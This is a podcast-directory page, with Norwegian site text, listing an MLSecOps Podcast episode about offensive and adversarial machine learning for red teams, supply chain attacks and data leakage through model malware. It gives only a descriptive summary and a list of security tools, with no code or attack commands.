Artwork

Innhold levert av MLSecOps.com. Alt podcastinnhold, inkludert episoder, grafikk og podcastbeskrivelser, lastes opp og leveres direkte av MLSecOps.com eller deres podcastplattformpartner. Hvis du tror at noen bruker det opphavsrettsbeskyttede verket ditt uten din tillatelse, kan du følge prosessen skissert her https://no.player.fm/legal.
Player FM - Podcast-app
Gå frakoblet med Player FM -appen!

Practical Offensive and Adversarial ML for Red Teams

35:24
 
Del
 

Manage episode 425466822 series 3461851
Innhold levert av MLSecOps.com. Alt podcastinnhold, inkludert episoder, grafikk og podcastbeskrivelser, lastes opp og leveres direkte av MLSecOps.com eller deres podcastplattformpartner. Hvis du tror at noen bruker det opphavsrettsbeskyttede verket ditt uten din tillatelse, kan du følge prosessen skissert her https://no.player.fm/legal.

Send us a text

Next on the MLSecOps Podcast, we have the honor of highlighting one of our MLSecOps Community members and Dropbox™ Red Teamers, Adrian Wood.
Adrian joined Protect AI threat researchers, Dan McInerney and Marcello Salvati, in the studio to share an array of insights, including what inspired him to create the Offensive ML (aka OffSec ML) Playbook, and diving into categories like adversarial machine learning (ML), offensive/defensive ML, and supply chain attacks.

The group also discusses dual uses for "traditional" ML and LLMs in the realm of security, the rise of agentic LLMs, and the potential for crown jewel data leakage via model malware (i.e. highly valuable and sensitive data being leaked out of an organization due to malicious software embedded within machine learning models or AI systems).

Thanks for checking out the MLSecOps Podcast! Get involved with the MLSecOps Community and find more resources at https://community.mlsecops.com.
Additional tools and resources to check out:
Protect AI Guardian: Zero Trust for ML Models

Recon: Automated Red Teaming for GenAI

Protect AI’s ML Security-Focused Open Source Tools

LLM Guard Open Source Security Toolkit for LLM Interactions

Huntr - The World's First AI/Machine Learning Bug Bounty Platform

  continue reading

41 episoder

Artwork
iconDel
 
Manage episode 425466822 series 3461851
Innhold levert av MLSecOps.com. Alt podcastinnhold, inkludert episoder, grafikk og podcastbeskrivelser, lastes opp og leveres direkte av MLSecOps.com eller deres podcastplattformpartner. Hvis du tror at noen bruker det opphavsrettsbeskyttede verket ditt uten din tillatelse, kan du følge prosessen skissert her https://no.player.fm/legal.

Send us a text

Next on the MLSecOps Podcast, we have the honor of highlighting one of our MLSecOps Community members and Dropbox™ Red Teamers, Adrian Wood.
Adrian joined Protect AI threat researchers, Dan McInerney and Marcello Salvati, in the studio to share an array of insights, including what inspired him to create the Offensive ML (aka OffSec ML) Playbook, and diving into categories like adversarial machine learning (ML), offensive/defensive ML, and supply chain attacks.

The group also discusses dual uses for "traditional" ML and LLMs in the realm of security, the rise of agentic LLMs, and the potential for crown jewel data leakage via model malware (i.e. highly valuable and sensitive data being leaked out of an organization due to malicious software embedded within machine learning models or AI systems).

Thanks for checking out the MLSecOps Podcast! Get involved with the MLSecOps Community and find more resources at https://community.mlsecops.com.
Additional tools and resources to check out:
Protect AI Guardian: Zero Trust for ML Models

Recon: Automated Red Teaming for GenAI

Protect AI’s ML Security-Focused Open Source Tools

LLM Guard Open Source Security Toolkit for LLM Interactions

Huntr - The World's First AI/Machine Learning Bug Bounty Platform

  continue reading

41 episoder

모든 에피소드

×
 
Loading …

Velkommen til Player FM!

Player FM scanner netter for høykvalitets podcaster som du kan nyte nå. Det er den beste podcastappen og fungerer på Android, iPhone og internett. Registrer deg for å synkronisere abonnement på flere enheter.

 

Hurtigreferanseguide

Copyright 2025 | Sitemap | Personvern | Vilkår for bruk | | opphavsrett
Lytt til dette showet mens du utforsker
Spill